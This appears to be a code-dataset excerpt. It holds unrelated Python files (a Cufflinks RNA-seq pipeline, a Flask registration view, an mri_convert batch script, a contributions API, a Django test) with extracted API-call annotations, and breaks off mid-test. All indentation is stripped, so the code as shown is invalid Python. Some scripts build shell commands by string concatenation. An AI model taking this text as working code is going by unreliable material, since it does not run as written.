if sample[:3] == 'SRR' and os.path.isdir(os.path.join(cufflinks_path, sample)):
w_asm.write(os.path.join(os.path.join(cufflinks_path, sample)) + '/transcripts.gtf' + '\n')
# run cuffmerge
os.system("cuffmerge -g " + gtf_file + " -s " + fasta_file + " -o " + cuffmerge_path + " -p " + str(thread) + " " +
os.path.join(cufflinks_path, 'assemblies.txt'))
return
def cuffdiff(bam_path, cuffmerge_path, cuffdiff_path, fasta_file, group_name, num_group1, thread=20):
# divide into groups
samples = os.listdir(bam_path)
all_sample = []
for sample in samples:
if sample[:3] == 'SRR' and os.path.isdir(os.path.join(bam_path, sample)):
all_sample.append(os.path.join(os.path.join(bam_path, sample), 'accepted_hits.bam'))
all_sample.sort()
group1 = all_sample[:num_group1]
group2 = all_sample[num_group1:]
# run cuffdiff
os.system("cuffdiff -o " + cuffdiff_path + " -p " + str(thread) +
" -L " + group_name + " -u " + os.path.join(cuffmerge_path, 'merged.gtf') + ' ' +
','.join(group1) + ' ' + ','.join(group2))
return
def main_func():
# take arguments from the commandline
parser = ArgumentParser(description='An aggregated python script of differential expression analysis '
'using cufflinks')
parser.add_argument('--bam_path',
help='path of bam-files from trimgalore, each sample has a single folder in the path '
'(cufflink, cuffdiff)')
parser.add_argument('--cufflinks_path',
help='the path saving the output of cufflinks function, and needs to be made in advance '
'(cufflink, cuffmerge)')
parser.add_argument('--process', nargs=4, type=int,
help='management of multiple process and thread, ther are four parameters and they indicate '
'the number of sample processed by cufflinks simultaneously, number of threads of '
'cufflinks, number of threads of cuffmerge and number of threads of cuffdiff ')
parser.add_argument('--cuffmerge_path',
help='the path saving the output of cuffmerge function, and needs to be made in advance '
'(cuffmerge, cuffdiff)')
parser.add_argument('--cuffdiff_path',
help='the path saving the output of cuffdiff function, and needs to be made in advance '
'(cuffdiff)')
parser.add_argument('--gtf_file', help='path of gtf-file involving genome annotation information (cuffmerge)')
parser.add_argument('--fasta_file', help='path of fasta-file of reference genome (cuffmerge, cuffdiff)')
parser.add_argument('--group_name', help='groups in the process of differential expression analysis '
'(cuffdiff)')
parser.add_argument('--num_group1', type=int, help='number of samples in group1 (cuffdiff)')
parser.add_argument('--procedure', help="procedures which need to run, input a comma-delimited list, for example, "
"'cufflinks,cuffmerge'", required=True)
args = parser.parse_args()
procedures = args.procedure
procedures = procedures.strip().split(',')
if args.process:
list_process = args.process
# cufflinks
if args.bam_path and args.cufflinks_path and 'cufflinks' in set(procedures):
cufflinks(args.bam_path, args.cufflinks_path, list_process[0], list_process[1])
# cuffmerge
if args.cufflinks_path and args.cuffmerge_path and args.gtf_file and args.fasta_file \
and 'cuffmerge' in set(procedures):
cuffmerge(args.cufflinks_path, args.cuffmerge_path, args.gtf_file, args.fasta_file, list_process[2])
# cuffdiff
if args.bam_path and args.cuffmerge_path and args.cuffdiff_path and args.fasta_file and args.group_name \
and args.num_group1 and 'cuffdiff' in set(procedures):
cuffdiff(args.bam_path, args.cuffmerge_path, args.cuffdiff_path, args.fasta_file, args.group_name,
args.num_group1, list_process[3])
else:
# cufflinks
if args.bam_path and args.cufflinks_path and 'cufflinks' in set(procedures):
cufflinks(args.bam_path, args.cufflinks_path)
# cuffmerge
if args.cufflinks_path and args.cuffmerge_path and args.gtf_file and args.fasta_file \
and 'cuffmerge' in set(procedures):
cuffmerge(args.cufflinks_path, args.cuffmerge_path, args.gtf_file, args.fasta_file)
# cuffdiff
if args.bam_path and args.cuffmerge_path and args.cuffdiff_path and args.fasta_file and args.group_name \
and args. num_group1 and 'cuffdiff' in set(procedures):
cuffdiff(args.bam_path, args.cuffmerge_path, args.cuffdiff_path, args.fasta_file, args.group_name,
args. num_group1)
return
if __name__ == '__main__':
start = time()
main_func()
end = time()
print(end - start)
| [
"os.path.join",
"os.listdir",
"time.time",
"argparse.ArgumentParser"
] | [((342, 362), 'os.listdir', 'os.listdir', (['bam_path'], {}), '(bam_path)\n', (352, 362), False, 'import os\n'), ((1242, 1268), 'os.listdir', 'os.listdir', (['cufflinks_path'], {}), '(cufflinks_path)\n', (1252, 1268), False, 'import os\n'), ((1950, 1970), 'os.listdir', 'os.listdir', (['bam_path'], {}), '(bam_path)\n', (1960, 1970), False, 'import os\n'), ((2643, 2762), 'argparse.ArgumentParser', 'ArgumentParser', ([], {'description': '"""An aggregated python script of differential expression analysis using cufflinks"""'}), "(description=\n 'An aggregated python script of differential expression analysis using cufflinks'\n )\n", (2657, 2762), False, 'from argparse import ArgumentParser\n'), ((6643, 6649), 'time.time', 'time', ([], {}), '()\n', (6647, 6649), False, 'from time import time\n'), ((6678, 6684), 'time.time', 'time', ([], {}), '()\n', (6682, 6684), False, 'from time import time\n'), ((1284, 1330), 'os.path.join', 'os.path.join', (['cufflinks_path', '"""assemblies.txt"""'], {}), "(cufflinks_path, 'assemblies.txt')\n", (1296, 1330), False, 'import os\n'), ((1740, 1786), 'os.path.join', 'os.path.join', (['cufflinks_path', '"""assemblies.txt"""'], {}), "(cufflinks_path, 'assemblies.txt')\n", (1752, 1786), False, 'import os\n'), ((460, 490), 'os.path.join', 'os.path.join', (['bam_path', 'sample'], {}), '(bam_path, sample)\n', (472, 490), False, 'import os\n'), ((2070, 2100), 'os.path.join', 'os.path.join', (['bam_path', 'sample'], {}), '(bam_path, sample)\n', (2082, 2100), False, 'import os\n'), ((1433, 1469), 'os.path.join', 'os.path.join', (['cufflinks_path', 'sample'], {}), '(cufflinks_path, sample)\n', (1445, 1469), False, 'import os\n'), ((2147, 2177), 'os.path.join', 'os.path.join', (['bam_path', 'sample'], {}), '(bam_path, sample)\n', (2159, 2177), False, 'import os\n'), ((982, 1017), 'os.path.join', 'os.path.join', (['bam_path', 'list_srr[i]'], {}), '(bam_path, list_srr[i])\n', (994, 1017), False, 'import os\n'), ((874, 914), 'os.path.join', 'os.path.join', (['cufflinks_out', 'list_srr[i]'], {}), '(cufflinks_out, list_srr[i])\n', (886, 914), False, 'import os\n'), ((2441, 2483), 'os.path.join', 'os.path.join', (['cuffmerge_path', '"""merged.gtf"""'], {}), "(cuffmerge_path, 'merged.gtf')\n", (2453, 2483), False, 'import os\n'), ((1514, 1550), 'os.path.join', 'os.path.join', (['cufflinks_path', 'sample'], {}), '(cufflinks_path, sample)\n', (1526, 1550), False, 'import os\n')] |
from flask import make_response, request, render_template, redirect
from flask.helpers import url_for
from models.session import Session
from models.user import User
from werkzeug.security import generate_password_hash
class RegisterView:
RESULT_SUCCESS = "success"
RESULT_USEREXISTS = "userexists"
RESULT_CREATEFAILED = "createfailed"
def __init__(self):
self.session = Session(request.cookies.get("session_id"))
self.view_model = {
"logged_in": self.session.logged_in,
"username": self.session.username,
"result": self.result_string(),
}
def render(self):
if request.method == "GET":
return self.get()
if request.method == "POST":
return self.post()
def get(self):
response = make_response(render_template("register.html", vm=self.view_model))
response.set_cookie("session_id", self.session.session_id, httponly=True, secure=True)
return response
def post(self):
response_url = url_for(".register") + "?result={result}"
result = self.RESULT_SUCCESS
# TODO: Validate username requirements
user = User(request.form["username"])
if user.user_exists():
result = self.RESULT_USEREXISTS
return redirect(response_url.format(result=result))
# TODO: Validate password requirements
user.password = generate_password_hash(request.form["password"], salt_length=16)
if not user.create_new_user():
result = self.RESULT_CREATEFAILED
return redirect(response_url.format(result=result))
def result_string(self):
result = request.args.get("result")
if result is None:
return None
if result == self.RESULT_SUCCESS:
return "registration_successful"
if result == self.RESULT_USEREXISTS:
return "Username already exists."
if result == self.RESULT_CREATEFAILED:
return "Failed to create user."
return "Unknown error."
| [
"flask.render_template",
"flask.request.args.get",
"models.user.User",
"flask.request.cookies.get",
"werkzeug.security.generate_password_hash",
"flask.helpers.url_for"
] | [((1189, 1219), 'models.user.User', 'User', (["request.form['username']"], {}), "(request.form['username'])\n", (1193, 1219), False, 'from models.user import User\n'), ((1431, 1495), 'werkzeug.security.generate_password_hash', 'generate_password_hash', (["request.form['password']"], {'salt_length': '(16)'}), "(request.form['password'], salt_length=16)\n", (1453, 1495), False, 'from werkzeug.security import generate_password_hash\n'), ((1690, 1716), 'flask.request.args.get', 'request.args.get', (['"""result"""'], {}), "('result')\n", (1706, 1716), False, 'from flask import make_response, request, render_template, redirect\n'), ((406, 439), 'flask.request.cookies.get', 'request.cookies.get', (['"""session_id"""'], {}), "('session_id')\n", (425, 439), False, 'from flask import make_response, request, render_template, redirect\n'), ((830, 882), 'flask.render_template', 'render_template', (['"""register.html"""'], {'vm': 'self.view_model'}), "('register.html', vm=self.view_model)\n", (845, 882), False, 'from flask import make_response, request, render_template, redirect\n'), ((1047, 1067), 'flask.helpers.url_for', 'url_for', (['""".register"""'], {}), "('.register')\n", (1054, 1067), False, 'from flask.helpers import url_for\n')] |
#! /bin/bash.env python
# *-* coding:utf-8 *-*
import os
import sys
os.system("touch a.sh && chmod +x a.sh")
os.system("mkdir output")
print("文件会被转换在output文件夹中")
x=int(input("输入数量:"))
fo = open("a.sh","r+")
for a in range(1,1+x) :
com="mri_convert -i "+"IM"+str(a)+" -o "+"./output/IM"+str(a)+".mgz"
fo.write(str(com))
fo.write("\n")
print("str(b) has been converted \n")
fo.close()
os.system("./a.sh")
os.system("rm a.sh")
| [
"os.system"
] | [((70, 110), 'os.system', 'os.system', (['"""touch a.sh && chmod +x a.sh"""'], {}), "('touch a.sh && chmod +x a.sh')\n", (79, 110), False, 'import os\n'), ((111, 136), 'os.system', 'os.system', (['"""mkdir output"""'], {}), "('mkdir output')\n", (120, 136), False, 'import os\n'), ((393, 412), 'os.system', 'os.system', (['"""./a.sh"""'], {}), "('./a.sh')\n", (402, 412), False, 'import os\n'), ((413, 433), 'os.system', 'os.system', (['"""rm a.sh"""'], {}), "('rm a.sh')\n", (422, 433), False, 'import os\n')] |
"""Overview page of contributions.
* Country selection
* Grouping by categories
* Statistics
"""
from flask import make_response
from config import Names as N
from control.utils import mjson, mktsv, pick as G, serverprint
from control.table import Table, SENSITIVE_TABLES, SENSITIVE_FIELDS
from control.typ.related import castObjectId
REVIEWED1 = "reviewed1"
REVIEWED2 = "reviewed2"
R1RANK = "r1Rank"
R2RANK = "r2Rank"
ASSESSED_STATUS = {
None: ("no assessment", "a-none"),
N.incomplete: ("started", "a-started"),
N.incompleteRevised: ("revision", "a-started"),
N.incompleteWithdrawn: ("withdrawn", "a-none"),
N.complete: ("filled-in", "a-self"),
N.completeRevised: ("revised", "a-self"),
N.completeWithdrawn: ("withdrawn", "a-none"),
N.submitted: ("in review", "a-inreview"),
N.submittedRevised: ("in review", "a-inreview"),
N.reviewReject: ("rejected", "a-rejected"),
N.reviewAccept: ("accepted", "a-accepted"),
}
ASSESSED_LABELS = {stage: info[0] for (stage, info) in ASSESSED_STATUS.items()}
ASSESSED_CLASS = {stage: info[1] for (stage, info) in ASSESSED_STATUS.items()}
ASSESSED_CLASS1 = {info[0]: info[1] for info in ASSESSED_STATUS.values()}
ASSESSED_DEFAULT_CLASS = ASSESSED_STATUS[None][1]
ASSESSED_RANK = {stage: i for (i, stage) in enumerate(ASSESSED_STATUS)}
NO_REVIEW = {
N.incomplete,
N.incompleteRevised,
N.incompleteWithdrawn,
N.complete,
N.completeRevised,
N.completeWithdrawn,
}
IN_REVIEW = {
N.submitted,
N.submittedRevised,
}
ADVISORY_REVIEW = {
N.reviewAdviseAccept,
N.reviewAdviseReject,
N.reviewAdviseRevise,
}
FINAL_REVIEW = {
N.reviewAccept,
N.reviewReject,
N.reviewRevise,
}
REVIEWED_STATUS = {
None: ("", "r-none"),
"noReview": ("not reviewable", "r-noreview"),
"inReview": ("in review", "r-inreview"),
"skipReview": ("review skipped", "r-skipreview"),
N.reviewAdviseReject: ("rejected", "r-rejected"),
N.reviewAdviseAccept: ("accepted", "r-accepted"),
N.reviewAdviseRevise: ("revise", "r-revised"),
N.reviewReject: ("rejected", "r-rejected"),
N.reviewAccept: ("accepted", "r-accepted"),
N.reviewRevise: ("revise", "r-revised"),
}
REVIEW_LABELS = {stage: info[0] for (stage, info) in REVIEWED_STATUS.items()}
REVIEW_CLASS = {stage: info[1] for (stage, info) in REVIEWED_STATUS.items()}
REVIEW_CLASS1 = {info[0]: info[1] for info in REVIEWED_STATUS.values()}
REVIEW_DEFAULT_CLASS = REVIEWED_STATUS[None][1]
REVIEW_RANK = {stage: i for (i, stage) in enumerate(REVIEWED_STATUS)}
class Api:
def __init__(self, context):
self.context = context
types = context.types
self.countryType = types.country
self.yearType = types.year
self.typeType = types.typeContribution
self.headers = dict(
json={
"Expires": "0",
"Cache-Control": "no-cache, no-store, must-revalidate",
"Content-Type": "application/json",
"Content-Encoding": "utf-8",
},
tsv={
"Expires": "0",
"Cache-Control": "no-cache, no-store, must-revalidate",
"Content-Type": "text/tab-separated-values",
"Content-Encoding": "utf-8",
},
)
def notimplemented(self, verb):
serverprint(f"Invalid api call requested: {verb}")
return make_response(mjson(None), self.headers["json"])
def list(self, givenTable):
parts = givenTable.rsplit(".", 1)
if len(parts) == 1:
table = givenTable
ext = "json"
else:
(table, ext) = parts
if ext not in {"json", "tsv"}:
serverprint(f"Invalid extension: {ext} in {givenTable}")
return make_response(mjson(None), self.headers["json"])
data = None
if table is not None and table not in SENSITIVE_TABLES:
if table == "contrib":
data = self.getContribs(ext)
else:
context = self.context
tableObj = Table(context, table)
data = tableObj.wrap(None, logical=True)
if data is None:
serverprint(f"Non existing table requested: {table}")
return make_response(
mjson(data) if ext == "json" else mktsv(data), self.headers[ext]
)
def view(self, table, givenEid):
record = None
eid = castObjectId(givenEid)
if table is not None and eid is not None and table not in SENSITIVE_TABLES:
context = self.context
tableObj = Table(context, table)
recordObj = tableObj.record(eid=eid)
record = recordObj.wrapLogical()
if table == "contrib":
extra = self.getExtra(record)
for (k, v) in extra.items():
record[k] = v
for k in SENSITIVE_FIELDS:
if k in record:
del record[k]
k = "typeContribution"
if k in record:
record["type"] = record[k]
del record[k]
if record is None:
serverprint(f"Non existing record requested: {table}/{givenEid}")
return make_response(mjson(record), self.headers["json"])
def getExtra(self, record):
context = self.context
wf = context.wf
workflow = wf.computeWorkflow(record)
selected = G(workflow, N.selected)
aStage = G(workflow, N.aStage)
r2Stage = G(workflow, N.r2Stage)
if r2Stage in {N.reviewAccept, N.reviewReject}:
aStage = r2Stage
score = G(workflow, N.score)
assessed = ASSESSED_STATUS[aStage][0]
aRank = (G(ASSESSED_RANK, aStage, default=0), score or 0)
if aStage != N.reviewAccept:
score = None
extra = {
N.assessed: assessed,
N.arank: aRank,
N.astage: aStage,
N.score: score,
N.selected: selected,
}
preR1Stage = G(workflow, N.r1Stage)
noReview = aStage is None or aStage in NO_REVIEW
inReview = aStage in IN_REVIEW
advReview = preR1Stage in ADVISORY_REVIEW
r1Stage = (
"noReview"
if noReview
else preR1Stage
if advReview
else "inReview"
if inReview
else "skipReview"
)
r2Stage = (
"noReview"
if noReview
else "inReview"
if inReview
else G(workflow, N.r2Stage)
)
reviewed1 = REVIEWED_STATUS[r1Stage][0]
reviewed2 = REVIEWED_STATUS[r2Stage][0]
r1Rank = G(REVIEW_RANK, r1Stage, default=0)
r2Rank = G(REVIEW_RANK, r2Stage, default=0)
extra.update(
{
REVIEWED1: reviewed1,
REVIEWED2: reviewed2,
R1RANK: r1Rank,
R2RANK: r2Rank,
N.r1Stage: r1Stage,
N.r2Stage: r2Stage,
}
)
return extra
def getContribs(self, ext):
context = self.context
db = context.db
countryType = self.countryType
yearType = self.yearType
typeType = self.typeType
asTsv = ext == "tsv"
contribs = []
if asTsv:
contribsFull = {G(r, N._id): r for r in db.getList(N.contrib)}
context = self.context
tableObj = Table(context, N.contrib)
for record in db.bulkContribWorkflow(None, False):
title = G(record, N.title)
contribId = G(record, N._id)
selected = G(record, N.selected)
aStage = G(record, N.aStage)
r2Stage = G(record, N.r2Stage)
if r2Stage in {N.reviewAccept, N.reviewReject}:
aStage = r2Stage
score = G(record, N.score)
assessed = ASSESSED_STATUS[aStage][0]
aRank = (G(ASSESSED_RANK, aStage, default=0), score or 0)
if aStage != N.reviewAccept:
score = None
countryRep = countryType.titleStr(
G(db.country, G(record, N.country)), markup=None
)
yearRep = yearType.titleStr(G(db.year, G(record, N.year)), markup=None)
typeRep = typeType.titleStr(
G(db.typeContribution, G(record, N.type)), markup=None
)
contribRecord = {
N._id: contribId,
N.country: countryRep,
N.year: yearRep,
N.type: typeRep,
N.title: title,
N.assessed: assessed,
N.arank: aRank,
N.astage: aStage,
N.score: score,
N.selected: selected,
}
preR1Stage = G(record, N.r1Stage)
noReview = aStage is None or aStage in NO_REVIEW
inReview = aStage in IN_REVIEW
advReview = preR1Stage in ADVISORY_REVIEW
r1Stage = (
"noReview"
if noReview
else preR1Stage
if advReview
else "inReview"
if inReview
else "skipReview"
)
r2Stage = (
"noReview"
if noReview
else "inReview"
if inReview
else G(record, N.r2Stage)
)
reviewed1 = REVIEWED_STATUS[r1Stage][0]
reviewed2 = REVIEWED_STATUS[r2Stage][0]
r1Rank = G(REVIEW_RANK, r1Stage, default=0)
r2Rank = G(REVIEW_RANK, r2Stage, default=0)
contribRecord.update(
{
REVIEWED1: reviewed1,
REVIEWED2: reviewed2,
R1RANK: r1Rank,
R2RANK: r2Rank,
N.r1Stage: r1Stage,
N.r2Stage: r2Stage,
}
)
if asTsv:
fullObj = tableObj.record(record=G(contribsFull, contribId, {}))
full = fullObj.wrapLogical()
contribRecord.update({
N.dateDecided: G(full, N.dateDecided),
N.vcc: G(full, N.vcc),
N.description: G(full, N.description),
N.contactPersonName: G(full, N.contactPersonName),
N.contactPersonEmail: G(full, N.contactPersonEmail),
N.urlContribution: G(full, N.urlContribution),
N.urlAcademic: G(full, N.urlAcademic),
N.tadirahObject: G(full, N.tadirahObject),
N.tadirahActivity: G(full, N.tadirahActivity),
N.tadirahTechnique: G(full, N.tadirahTechnique),
N.keyword: G(full, N.keyword),
N.discipline: G(full, N.discipline),
})
contribs.append(contribRecord)
return contribs
| [
"control.table.Table",
"control.typ.related.castObjectId",
"control.utils.pick",
"control.utils.serverprint",
"control.utils.mjson",
"control.utils.mktsv"
] | [((3351, 3401), 'control.utils.serverprint', 'serverprint', (['f"""Invalid api call requested: {verb}"""'], {}), "(f'Invalid api call requested: {verb}')\n", (3362, 3401), False, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((4458, 4480), 'control.typ.related.castObjectId', 'castObjectId', (['givenEid'], {}), '(givenEid)\n', (4470, 4480), False, 'from control.typ.related import castObjectId\n'), ((5493, 5516), 'control.utils.pick', 'G', (['workflow', 'N.selected'], {}), '(workflow, N.selected)\n', (5494, 5516), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((5534, 5555), 'control.utils.pick', 'G', (['workflow', 'N.aStage'], {}), '(workflow, N.aStage)\n', (5535, 5555), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((5574, 5596), 'control.utils.pick', 'G', (['workflow', 'N.r2Stage'], {}), '(workflow, N.r2Stage)\n', (5575, 5596), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((5698, 5718), 'control.utils.pick', 'G', (['workflow', 'N.score'], {}), '(workflow, N.score)\n', (5699, 5718), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((6097, 6119), 'control.utils.pick', 'G', (['workflow', 'N.r1Stage'], {}), '(workflow, N.r1Stage)\n', (6098, 6119), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((6760, 6794), 'control.utils.pick', 'G', (['REVIEW_RANK', 'r1Stage'], {'default': '(0)'}), '(REVIEW_RANK, r1Stage, default=0)\n', (6761, 6794), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((6812, 6846), 'control.utils.pick', 'G', (['REVIEW_RANK', 'r2Stage'], {'default': '(0)'}), '(REVIEW_RANK, r2Stage, default=0)\n', (6813, 6846), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((3431, 3442), 'control.utils.mjson', 'mjson', (['None'], {}), '(None)\n', (3436, 3442), False, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((3723, 3779), 'control.utils.serverprint', 'serverprint', (['f"""Invalid extension: {ext} in {givenTable}"""'], {}), "(f'Invalid extension: {ext} in {givenTable}')\n", (3734, 3779), False, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((4213, 4266), 'control.utils.serverprint', 'serverprint', (['f"""Non existing table requested: {table}"""'], {}), "(f'Non existing table requested: {table}')\n", (4224, 4266), False, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((4623, 4644), 'control.table.Table', 'Table', (['context', 'table'], {}), '(context, table)\n', (4628, 4644), False, 'from control.table import Table, SENSITIVE_TABLES, SENSITIVE_FIELDS\n'), ((5207, 5272), 'control.utils.serverprint', 'serverprint', (['f"""Non existing record requested: {table}/{givenEid}"""'], {}), "(f'Non existing record requested: {table}/{givenEid}')\n", (5218, 5272), False, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((5302, 5315), 'control.utils.mjson', 'mjson', (['record'], {}), '(record)\n', (5307, 5315), False, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((5782, 5817), 'control.utils.pick', 'G', (['ASSESSED_RANK', 'aStage'], {'default': '(0)'}), '(ASSESSED_RANK, aStage, default=0)\n', (5783, 5817), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((7538, 7563), 'control.table.Table', 'Table', (['context', 'N.contrib'], {}), '(context, N.contrib)\n', (7543, 7563), False, 'from control.table import Table, SENSITIVE_TABLES, SENSITIVE_FIELDS\n'), ((7644, 7662), 'control.utils.pick', 'G', (['record', 'N.title'], {}), '(record, N.title)\n', (7645, 7662), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((7687, 7703), 'control.utils.pick', 'G', (['record', 'N._id'], {}), '(record, N._id)\n', (7688, 7703), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((7728, 7749), 'control.utils.pick', 'G', (['record', 'N.selected'], {}), '(record, N.selected)\n', (7729, 7749), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((7771, 7790), 'control.utils.pick', 'G', (['record', 'N.aStage'], {}), '(record, N.aStage)\n', (7772, 7790), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((7813, 7833), 'control.utils.pick', 'G', (['record', 'N.r2Stage'], {}), '(record, N.r2Stage)\n', (7814, 7833), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((7947, 7965), 'control.utils.pick', 'G', (['record', 'N.score'], {}), '(record, N.score)\n', (7948, 7965), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((8908, 8928), 'control.utils.pick', 'G', (['record', 'N.r1Stage'], {}), '(record, N.r1Stage)\n', (8909, 8928), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((9655, 9689), 'control.utils.pick', 'G', (['REVIEW_RANK', 'r1Stage'], {'default': '(0)'}), '(REVIEW_RANK, r1Stage, default=0)\n', (9656, 9689), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((9711, 9745), 'control.utils.pick', 'G', (['REVIEW_RANK', 'r2Stage'], {'default': '(0)'}), '(REVIEW_RANK, r2Stage, default=0)\n', (9712, 9745), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((3813, 3824), 'control.utils.mjson', 'mjson', (['None'], {}), '(None)\n', (3818, 3824), False, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((4097, 4118), 'control.table.Table', 'Table', (['context', 'table'], {}), '(context, table)\n', (4102, 4118), False, 'from control.table import Table, SENSITIVE_TABLES, SENSITIVE_FIELDS\n'), ((4309, 4320), 'control.utils.mjson', 'mjson', (['data'], {}), '(data)\n', (4314, 4320), False, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((4343, 4354), 'control.utils.mktsv', 'mktsv', (['data'], {}), '(data)\n', (4348, 4354), False, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((6614, 6636), 'control.utils.pick', 'G', (['workflow', 'N.r2Stage'], {}), '(workflow, N.r2Stage)\n', (6615, 6636), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((7433, 7444), 'control.utils.pick', 'G', (['r', 'N._id'], {}), '(r, N._id)\n', (7434, 7444), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((8037, 8072), 'control.utils.pick', 'G', (['ASSESSED_RANK', 'aStage'], {'default': '(0)'}), '(ASSESSED_RANK, aStage, default=0)\n', (8038, 8072), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((8234, 8254), 'control.utils.pick', 'G', (['record', 'N.country'], {}), '(record, N.country)\n', (8235, 8254), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((8334, 8351), 'control.utils.pick', 'G', (['record', 'N.year'], {}), '(record, N.year)\n', (8335, 8351), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((8447, 8464), 'control.utils.pick', 'G', (['record', 'N.type'], {}), '(record, N.type)\n', (8448, 8464), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((9495, 9515), 'control.utils.pick', 'G', (['record', 'N.r2Stage'], {}), '(record, N.r2Stage)\n', (9496, 9515), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((10137, 10167), 'control.utils.pick', 'G', (['contribsFull', 'contribId', '{}'], {}), '(contribsFull, contribId, {})\n', (10138, 10167), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((10288, 10310), 'control.utils.pick', 'G', (['full', 'N.dateDecided'], {}), '(full, N.dateDecided)\n', (10289, 10310), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((10339, 10353), 'control.utils.pick', 'G', (['full', 'N.vcc'], {}), '(full, N.vcc)\n', (10340, 10353), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((10390, 10412), 'control.utils.pick', 'G', (['full', 'N.description'], {}), '(full, N.description)\n', (10391, 10412), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((10455, 10483), 'control.utils.pick', 'G', (['full', 'N.contactPersonName'], {}), '(full, N.contactPersonName)\n', (10456, 10483), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((10527, 10556), 'control.utils.pick', 'G', (['full', 'N.contactPersonEmail'], {}), '(full, N.contactPersonEmail)\n', (10528, 10556), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((10597, 10623), 'control.utils.pick', 'G', (['full', 'N.urlContribution'], {}), '(full, N.urlContribution)\n', (10598, 10623), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((10660, 10682), 'control.utils.pick', 'G', (['full', 'N.urlAcademic'], {}), '(full, N.urlAcademic)\n', (10661, 10682), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((10721, 10745), 'control.utils.pick', 'G', (['full', 'N.tadirahObject'], {}), '(full, N.tadirahObject)\n', (10722, 10745), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((10786, 10812), 'control.utils.pick', 'G', (['full', 'N.tadirahActivity'], {}), '(full, N.tadirahActivity)\n', (10787, 10812), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((10854, 10881), 'control.utils.pick', 'G', (['full', 'N.tadirahTechnique'], {}), '(full, N.tadirahTechnique)\n', (10855, 10881), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((10914, 10932), 'control.utils.pick', 'G', (['full', 'N.keyword'], {}), '(full, N.keyword)\n', (10915, 10932), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n'), ((10968, 10989), 'control.utils.pick', 'G', (['full', 'N.discipline'], {}), '(full, N.discipline)\n', (10969, 10989), True, 'from control.utils import mjson, mktsv, pick as G, serverprint\n')] |
from unittest.mock import patch
from django.test import TestCase
import vcr
from data_refinery_common.models import (
Contribution,
Experiment,
ExperimentSampleAssociation,
OntologyTerm,
Sample,
SampleAttribute,
)
from data_refinery_foreman.foreman.management.commands.import_external_sample_attributes import (
Command,
import_metadata,
import_sample_attributes,
)
TEST_METADATA = "/home/user/data_store/externally_supplied_metadata/test_data/metadata.json"
class ImportExternalSampleAttributesTestCase(TestCase):
def setUp(self):
experiment = Experiment()
experiment.accession_code = "GSE000"
experiment.alternate_accession_code = "E-GEOD-000"
experiment.title = "NONONONO"
experiment.description = "Boooooourns. Wasabi."
experiment.technology = "RNA-SEQ"
experiment.save()
self.experiment = experiment
# Create some samples to attach metadata to
sample = Sample()
sample.accession_code = "SRR123"
sample.technology = "RNA-SEQ"
sample.source_database = "SRA"
sample.title = "Not important"
sample.save()
experiment_sample_association = ExperimentSampleAssociation()
experiment_sample_association.sample = sample
experiment_sample_association.experiment = experiment
experiment_sample_association.save()
sample2 = Sample()
sample2.accession_code = "SRR456"
sample2.technology = "RNA-SEQ"
sample2.source_database = "SRA"
sample2.title = "Not important"
sample2.save()
experiment_sample_association = ExperimentSampleAssociation()
experiment_sample_association.sample = sample2
experiment_sample_association.experiment = experiment
experiment_sample_association.save()
# Create the ontology terms I'm using in the tests
name = OntologyTerm()
name.ontology_term = "PATO:0000122"
name.human_readable_name = "length"
name.save()
unit = OntologyTerm()
unit.ontology_term = "UO:0010012"
unit.human_readable_name = "thou"
unit.save()
contribution = Contribution()
contribution.source_name = "refinebio_tests"
contribution.methods_url = "ccdatalab.org"
contribution.save()
self.contribution = contribution
#
# Test import_sample_attributes()
#
def test_skip_unknown_sample(self):
"""Make sure that if someone has metadata for a sample that we haven't
surveyed then we just do nothing"""
METADATA = [{"PATO:0000122": {"value": 25, "unit": "UO:0010012"}}]
import_sample_attributes("SRR789", METADATA, self.contribution)
self.assertEqual(SampleAttribute.objects.all().count(), 0)
def test_import_invalid_ontology_term(self):
